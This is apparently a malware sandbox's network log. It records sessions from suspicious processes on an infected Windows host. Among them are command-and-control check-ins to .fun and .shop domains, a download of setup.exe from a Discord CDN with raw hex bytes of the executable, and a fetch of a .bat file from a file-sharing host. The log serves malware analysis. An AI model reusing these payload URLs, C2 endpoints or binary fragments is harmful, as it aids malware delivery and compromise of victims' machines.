2024-08-31 13:44:37 UTC	126	IN	Data Raw: 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: ogies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49742	188.114.97.3	443	3424	C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:44:51 UTC	322	OUT	POST /shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 96 Host: jirafasaltas.fun
2024-08-31 13:44:51 UTC	96	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-08-31 13:44:53 UTC	514	IN	HTTP/1.1 204 No Content Date: Sat, 31 Aug 2024 13:44:52 GMT Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vTdK9%2FG4JYMGDOn4l%2FWAqhhY8iTr0LElt5XWmva137S7Ah95KvbavbHGTVLPF4Ync497PbF%2F7Fy3yeUGIMPVmo8gRByy7%2BbsxJIFZ3ZqvGO8JWeNWXOH6vN82AASCdxtHBeL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbd752d0c198c7e-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49749	162.159.134.233	443	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:44:57 UTC	222	OUT	GET /attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc& HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2024-08-31 13:44:57 UTC	1179	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:57 GMT Content-Type: application/x-msdos-program Content-Length: 7596943 Connection: close CF-Ray: 8bbd754e7c087c88-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="setup.exe" ETag: "14a56f81287d1e037fc6405247c31d20" Expires: Sun, 31 Aug 2025 13:44:57 GMT Last-Modified: Sat, 31 Aug 2024 09:19:33 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1725095973738607 x-goog-hash: crc32c=AFcygg== x-goog-hash: md5=FKVvgSh9HgN/xkBSR8MdIA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7596943 x-guploader-uploadid: AD-8ljtNKh1Mx8y1YGjYdKr1uARjlX7l-Nz69nhe30gYuwETxb5InBKyySfoJbNvkeE_dWe6HWk X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=LHsrrbgtUxT4kwAgbRj6laMytL3C1Z4RV6pcnK6pSnI-1725111897-1.0.1.1-kvodG6Qf4AnIfN9PfVCc2DdkPWL9cpt0lrhuihl03RAclDs9dWeMTzDjJv7IRWkGA1gVjCK6wVNPkOy_GcabrQ; path=/; expires=Sat, 31-Aug-24 14:14:57 GMT; domain=.discordapp.com; HttpOnly; Secure
2024-08-31 13:44:57 UTC	519	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 51 77 4f 32 37 38 39 30 44 4d 78 66 73 5a 73 34 44 4b 73 56 6d 6a 34 49 4d 25 32 42 63 68 6b 31 47 70 46 44 45 44 53 4d 69 35 6d 34 4e 31 56 6b 6a 34 50 6b 75 51 70 72 34 6d 41 79 39 6f 7a 76 4e 65 6f 39 65 54 25 32 46 45 55 64 67 7a 35 69 37 54 50 73 33 59 48 71 74 6e 66 6e 41 7a 38 66 45 78 46 67 4a 6a 42 68 25 32 46 69 79 6a 4a 34 57 54 57 79 25 32 46 72 4c 61 6e 74 56 25 32 42 37 6b 57 6c 62 55 56 6f 33 48 61 5a 7a 6e 6e 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QwO27890DMxfsZs4DKsVmj4IM%2Bchk1GpFDEDSMi5m4N1Vkj4PkuQpr4mAy9ozvNeo9eT%2FEUdgz5i7TPs3YHqtnfnAz8fExFgJjBh%2FiyjJ4WTWy%2FrLantV%2B7kWlbUVo3HaZznnw%3D%3D"}],"group":"cf-nel","max_a
2024-08-31 13:44:57 UTC	1040	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd e1 1d 57 99 80 73 04 99 80 73 04 99 80 73 04 1a 9c 7d 04 80 80 73 04 af a6 79 04 d9 80 73 04 17 88 2c 04 98 80 73 04 99 80 72 04 21 80 73 04 1a 88 2e 04 90 80 73 04 af a6 78 04 d4 80 73 04 f6 f6 d9 04 9e 80 73 04 f6 f6 ed 04 98 80 73 04 5e 86 75 04 98 80 73 04 52 69 63 68 99 80 73 04 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f7 53 e5 4c 00 00 00 00 00 00 00 00 e0 00 0f Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Wsss}sys,sr!s.sxsss^usRichsPELSL
2024-08-31 13:44:57 UTC	1369	IN	Data Raw: 42 00 3b c3 55 8b ec 81 ec 34 01 00 00 8b 45 08 53 56 57 a3 44 31 42 00 e8 24 0a 00 00 6a 03 33 db 5f 8d 8d 68 ff ff ff 57 a2 48 31 42 00 89 9d 68 ff ff ff 89 9d 6c ff ff ff 89 9d 70 ff ff ff e8 1b 11 00 00 57 8d 4d e4 89 5d e4 89 5d e8 89 5d ec e8 09 11 00 00 57 8d 4d b4 89 5d b4 89 5d b8 89 5d bc e8 f7 10 00 00 57 8d 4d 90 89 5d 90 89 5d 94 89 5d 98 e8 e5 10 00 00 ff 15 94 b0 41 00 50 8d 4d c0 e8 e6 0b 00 00 8d 45 e4 8d 95 68 ff ff ff 50 8d 4d c0 e8 42 28 00 00 ff 75 c0 e8 e8 29 00 00 59 89 5d 9c 57 8d 4d 9c 89 5d a0 89 5d a4 e8 a9 10 00 00 8b 0d 44 31 42 00 8d 55 9c e8 0d 35 00 00 8d 4d e4 e8 81 12 00 00 8d 4d e4 e8 3e 12 00 00 68 74 02 42 00 8d 4d c0 88 5d 0b e8 8b 0b 00 00 8b f0 8d 45 f0 6a 02 50 8d 4d e4 e8 35 0d 00 00 8b 16 8b 08 e8 41 2a 00 00 ff Data Ascii: B;U4ESVWD1B$j3_hWH1BhlpWM]]]WM]]]WM]]]APMEhPMB(u)Y]WM]]D1BU5MM>htBM]EjPM5A*
2024-08-31 13:44:57 UTC	1369	IN	Data Raw: 8d 45 ff 50 8d 85 3c ff ff ff ff b5 2c ff ff ff 8b cf 50 e8 94 19 00 00 3b c3 74 74 38 5d 0b 75 67 83 f8 01 74 05 38 5d ff 74 28 6a 08 8d 8d 48 ff ff ff 5a e8 8d 4a 00 00 50 8d 4d d8 e8 cf 07 00 00 ff b5 48 ff ff ff e8 e6 24 00 00 59 b8 05 40 00 80 3d 04 40 00 80 74 2e 39 5d dc 74 29 6a 07 8d 8d 48 ff ff ff 5a e8 59 4a 00 00 8b 00 6a 10 50 ff 75 d8 53 ff 15 e4 b1 41 00 ff b5 48 ff ff ff e8 ac 24 00 00 59 ff 75 d8 e9 be 02 00 00 ff 75 d8 e8 9b 24 00 00 59 8d 4d 84 e8 c3 08 00 00 8d 4d 84 e8 21 3a 00 00 ff b5 78 ff ff ff 8b 35 90 b0 41 00 ff d6 85 c0 75 2d ff 75 84 ff d6 ff 75 84 e8 6b 24 00 00 ff b5 3c ff ff ff e8 60 24 00 00 59 59 3b fb 0f 84 a2 fe ff ff 8b 07 57 ff 50 08 e9 97 fe ff ff 39 5d b8 0f 84 d2 00 00 00 8d 55 b4 8d 4d c0 e8 b3 03 00 00 8b 45 c0 Data Ascii: EP<,P;tt8]ugt8]t(jHZJPMH$Y@=@t.9]t)jHZYJjPuSAH$Yuu$YMM!:x5Au-uuk$<`$YY;WP9]UME
2024-08-31 13:44:57 UTC	1369	IN	Data Raw: 00 51 56 8d 71 08 89 75 f0 c7 06 3c b3 41 00 83 65 fc 00 8b ce e8 fa 27 00 00 83 4d fc ff 8b ce e8 c6 27 00 00 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 c8 90 41 00 e8 56 1e 01 00 b8 24 10 00 00 e8 b8 21 01 00 8b 45 0c 56 57 33 ff 8b f2 89 78 04 8b 00 89 75 d0 80 20 00 83 4d e4 ff 51 8d 4d e4 89 7d fc e8 41 40 00 00 84 c0 75 13 83 4d fc ff 8d 4d e4 e8 39 3e 00 00 32 c0 e9 28 01 00 00 80 3e 00 89 7d ec 74 0c ff 45 ec 8b 45 ec 80 3c 30 00 75 f4 8b 45 08 89 7d e8 80 38 00 74 0c ff 45 e8 8b 4d e8 80 3c 01 00 75 f4 33 f6 80 65 f3 00 53 89 7d dc 89 7d e0 eb 02 33 ff b8 00 10 00 00 8d 4d d8 2b c6 51 50 8d 84 35 d0 ef ff ff 50 8d 4d e4 e8 2f 40 00 00 84 c0 0f 84 b7 00 00 00 8b 45 d8 3b c7 0f 84 a8 00 00 00 03 f0 8d 9d d0 ef ff ff 80 7d f3 00 8b c6 74 32 2b 45 e8 Data Ascii: QVqu<Ae'M'M^dAV$!EVW3xu MQM}A@uMM9>2(>}tEE<0uE}8tEM<u3eS}}3M+QP5PM/@E;}t2+E
2024-08-31 13:44:57 UTC	1369	IN	Data Raw: 41 00 83 65 fc 00 e8 b0 22 00 00 83 4d fc ff 8b ce e8 7c 22 00 00 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 56 8b f1 e8 14 00 00 00 f6 44 24 08 01 74 07 56 e8 49 1a 00 00 59 8b c6 5e c2 04 00 b8 f0 90 41 00 e8 f0 18 01 00 51 56 8b f1 89 75 f0 c7 06 34 b3 41 00 83 65 fc 00 e8 5c 22 00 00 83 4d fc ff 8b ce e8 28 22 00 00 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 0f 91 41 00 e8 b8 18 01 00 51 51 56 57 8b f9 89 7d f0 83 65 fc 00 8d 77 18 89 75 ec c7 06 44 b3 41 00 8b ce c6 45 fc 01 e8 16 22 00 00 80 65 fc 00 8b ce e8 e2 21 00 00 ff 77 0c e8 c9 19 00 00 59 5f 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 ff 31 e8 b3 19 00 00 59 c3 56 8b f1 e8 14 00 00 00 f6 44 24 08 01 74 07 56 e8 9c 19 00 00 59 8b c6 5e c2 04 00 b8 24 91 41 00 e8 43 18 01 00 51 56 8b f1 89 75 f0 c7 06 Data Ascii: Ae"M\|"M^dVD$tVIY^AQVu4Ae\"M("M^dAQQVW}ewuDAE"e!wY_M^d1YVD$tVY^$ACQVu
2024-08-31 13:44:57 UTC	1369	IN	Data Raw: fc ff ff 8b 07 8b 0e 8b d0 69 d2 ff ff ff 7f 03 56 04 8d 54 12 02 52 8d 14 41 03 c3 52 8d 04 41 50 e8 e6 13 01 00 83 c4 0c 5f 5e 5b c2 08 00 b8 74 91 41 00 e8 a7 13 01 00 83 ec 10 56 33 f6 6a 03 8d 4d e4 89 75 f0 89 75 e4 89 75 e8 89 75 ec e8 a7 fb ff ff 6a 20 8d 4d e4 89 75 fc e8 e2 f7 ff ff 6a 0a 8d 4d e4 e8 d8 f7 ff ff 6a 09 8d 4d e4 e8 ce f7 ff ff 8b 4d 08 8d 45 e4 50 e8 eb f6 ff ff ff 75 e4 e8 9e 14 00 00 8b 45 08 59 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c2 04 00 8b 11 8b c2 66 8b 08 66 3b 4c 24 04 74 09 66 85 c9 74 0a 40 40 eb ed 2b c2 d1 f8 eb 03 83 c8 ff c2 04 00 b8 88 91 41 00 e8 16 13 01 00 83 ec 10 83 65 f0 00 56 8b f1 52 8d 4d e4 e8 90 f6 ff ff ff 75 08 83 65 fc 00 8d 4d e4 e8 83 f7 ff ff 8d 45 e4 8b ce 50 e8 76 f6 ff ff ff 75 e4 e8 29 14 00 00 Data Ascii: iVTRARAP_^[tAV3jMuuuuj MujMjMMEPuEYM^dff;L$tft@@+AeVRMueMEPvu)
2024-08-31 13:44:57 UTC	1369	IN	Data Raw: ff ff ff e8 0c 04 00 00 ff 75 b8 8d 8d 54 ff ff ff c6 45 fc 09 e8 5a 2d 00 00 84 c0 0f 84 83 00 00 00 8b 4d b8 e8 03 21 00 00 84 c0 75 77 ff 35 7c 02 42 00 8d 8e e4 00 00 00 e8 0f f2 ff ff ff b5 7c ff ff ff e8 85 0f 00 00 ff 75 b8 e8 7d 0f 00 00 ff 75 9c e8 75 0f 00 00 83 c4 0c 89 7d c4 c6 45 fc 0a bb 05 40 00 80 8d 4d c4 e8 98 17 00 00 8d 4d c4 c6 45 fc 02 e8 63 17 00 00 8d 4d d8 c6 45 fc 01 e8 de 32 00 00 ff 75 e8 e8 3e 0f 00 00 83 4d fc ff 59 8d 4d a8 e8 c9 32 00 00 8b c3 e9 68 01 00 00 38 5d 0b 0f 85 f0 00 00 00 6a 18 e8 f4 0e 00 00 3b c3 59 74 11 89 58 04 83 48 08 ff c7 00 54 b3 41 00 8b f8 eb 02 33 ff 3b fb 89 7e 48 89 7d 0c 74 06 8b 07 57 ff 50 04 8b 4d b8 8b 46 48 6a 01 51 89 58 10 8d 48 08 c6 45 fc 0b 89 58 14 e8 7e 30 00 00 84 c0 0f 85 87 00 00 Data Ascii: uTEZ-M!uw5\|B\|u}uu}E@MMEcME2u>MYM2h8]j;YtXHTA3;~H}tWPMFHjQXHEX~0
2024-08-31 13:44:57 UTC	1369	IN	Data Raw: 0a 00 00 59 88 5d fc 8d 4d 0c e8 ab 01 01 00 eb 0b 8d 8d 6c ff ff ff e8 d1 00 00 00 8b 75 14 8d 45 d0 50 8b ce e8 2a ed ff ff 39 5e 04 75 10 8b 45 88 8b ce 05 e4 00 00 00 50 e8 15 ed ff ff 8b 45 88 8b 4d 10 8b 75 cc 8a 80 e0 00 00 00 88 01 83 4d fc ff 8d 8d 6c ff ff ff e8 05 04 00 00 8b 4d f4 8b c6 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 10 00 e9 43 01 01 00 b8 7c 92 41 00 e8 ad 08 01 00 83 ec 0c 56 8b f1 57 ff 75 08 8d 7e 68 8d 4f 0c e8 be ec ff ff 6a 00 68 f4 01 00 00 8b cf e8 41 31 00 00 8b 45 0c 8b 08 e8 3c 01 01 00 6a 45 8d 4d e8 5a e8 50 2f 00 00 8b 10 8b 4e 6c 83 65 fc 00 e8 5c 2f 00 00 ff 75 e8 e8 a7 09 00 00 59 6a 01 ff 76 6c ff 15 e0 b1 41 00 8b 4d f4 5f 33 c0 5e 64 89 0d 00 00 00 00 c9 c2 08 00 b8 b0 92 41 00 e8 37 08 01 00 83 ec 5c 53 56 8b f1 57 Data Ascii: Y]MluEP*9^uEPEMuMlM_^[dC\|AVWu~hOjhA1E<jEMZP/Nle\/uYjvlAM_3^dA7\SVW
2024-08-31 13:44:57 UTC	1369	IN	Data Raw: 79 04 89 79 08 e8 e7 eb ff ff 8b 4d f4 c7 06 9c b3 41 00 c7 46 04 90 b3 41 00 8b c6 5f 5e 64 89 0d 00 00 00 00 c9 c3 b8 e5 93 41 00 e8 a4 03 01 00 51 51 53 56 8b f1 33 db 57 89 75 ec 89 5e 04 c7 06 1c b4 41 00 8d 4e 0c 89 5e 08 6a 03 89 5d fc 89 19 89 59 04 89 59 08 e8 93 eb ff ff 8d 7e 3c 89 5e 30 89 1f 8d 4e 40 c6 45 fc 02 e8 73 00 00 00 83 4e 70 ff 33 d2 8b cf c6 45 fc 03 c7 06 ec b3 41 00 88 5e 38 88 5e 39 88 5e 3a 88 5e 3b e8 8c fc 00 00 85 c0 74 15 8d 45 f0 68 c0 c4 41 00 50 c7 45 f0 cb 5e 14 00 e8 10 07 01 00 8b 4d f4 8b c6 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 b0 01 c3 32 c0 c2 0c 00 c3 32 c0 c2 08 00 6a 01 ff 71 04 ff 15 d8 b1 41 00 c3 6a 02 ff 71 04 ff 15 d8 b1 41 00 c3 56 8b f1 e8 a4 fc 00 00 33 c0 c7 46 20 01 00 00 00 89 46 28 88 46 18 88 46 19 Data Ascii: yyMAFA_^dAQQSV3Wu^AN^j]YY~<^0N@EsNp3EA^8^9^:^;tEhAPE^M_^[d22jqAjqAV3F F(FF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49755	188.114.96.3	443	5716	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:45:02 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: locatedblsoqp.shop
2024-08-31 13:45:02 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-31 13:45:02 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:45:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1jmf8qk30ohq3rnqkt6quh14or; expires=Wed, 25 Dec 2024 07:31:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5okdTWME6Qk31U73IEWG3ILTtLv749wLpd8w1BjdTLJKRbxvDlOKpYRtKXpK%2FKx6q%2FUJw2jx%2BuqNLAkWZILN2QmF3uYS9FnQfNH8DmZYhKKufK%2Ba9SC6wF4TXqB5RONONnR8b0s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbd756d1f647d13-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 13:45:02 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-31 13:45:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49760	188.114.97.3	443	5716	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:45:03 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: traineiwnqo.shop
2024-08-31 13:45:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-31 13:45:03 UTC	551	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:45:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyItFW9zL%2BbMwg6Qt05%2Fl3gYuDFxHC0CmbkwjfrigNj30sVZURPWqygtHWhGGDfElBI31DBZwrI%2FGcvr95gChXglz%2BpZCZW3mqJ4VWYfJ9H2BPzN34HSDNQYe8kmo%2FM2qK7%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbd75731bd442e5-EWR
2024-08-31 13:45:03 UTC	818	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-31 13:45:03 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-08-31 13:45:03 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 74 37 70 55 6e 5a 59 66 5f 43 44 36 72 6a 71 65 64 38 59 6b 71 6e 37 59 61 34 7a 48 68 6d 6c 4f 47 59 6a 57 6f 58 56 56 44 68 59 2d 31 37 32 35 31 31 31 39 30 33 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 Data Ascii: <input type="hidden" name="atok" value="t7pUnZYf_CD6rjqed8Ykqn7Ya4zHhmlOGYjWoXVVDhY-1725111903-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
2024-08-31 13:45:03 UTC	849	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 Data Ascii: m:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
2024-08-31 13:45:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49765	104.21.21.16	443	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:45:05 UTC	59	OUT	GET /dl/12041962/gh941.bat HTTP/1.1 Host: tmpfiles.org
